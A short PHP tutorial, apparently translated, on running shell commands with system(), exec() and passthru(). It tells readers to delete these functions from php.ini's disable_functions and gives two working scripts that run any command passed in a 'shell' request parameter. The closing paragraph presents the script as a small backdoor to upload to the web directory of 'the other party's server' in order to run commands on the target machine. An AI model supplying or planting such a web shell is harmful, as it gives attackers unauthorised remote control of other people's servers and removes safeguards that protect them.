php executes shell commands, you can use the following functions:
string system ( string $command [, int &$return_var ] ) string exec ( string $command [, array &$output [, int &$return_var ]] ) void passthru ( string $command [, int &$return_var ] )
These three functions are all prohibited by default
If you want to use these functions,
We must first modify the php configuration file php.ini
Find the keyword disable_functions, delete these function names in this item
Then pay attention to restart apache.
First look at the two functions of system() and passthru() are similar and can be interchanged:
<?php #Get webpage passing parameters $shell = $_REQUEST['shell']; echo "<pre>"; system($shell, $status); echo "</pre>"; //Pay attention to the correspondence between the execution result of the shell command and the status value returned by the execution $shell = "<font color='red'>$shell</font>"; if( $status ){ echo "The execution of the shell command {$shell} failed"; } else { echo "The shell command {$shell} was successfully executed"; } ?>
Access address and pass shell parameters
http://localhost:81/shell.php?shell=ipconfig
Note that system() will display the results immediately after the shell command is executed. This is more inconvenient, because sometimes we do not need to output the results immediately, or even output, so we can use exec()
Example of using exec():
<?php $shell = $_REQUEST['shell']; exec($shell, $result, $status); $shell = "<font color='red'>$shell</font>"; echo "<pre>"; if( $status ){ echo "The execution of the shell command {$shell} failed"; } else { echo "The shell command {$shell} was successfully executed, and the result is as follows<hr>"; print_r( $result ); } echo "</pre>"; ?>
exec() executes the shell command successfully, but does not return the result, you need to use the output command to output the result of $result
As a small backdoor, upload it to the website directory under the other party's server, visit the address, you can execute the command you want to execute on the target machine, and get the echo result.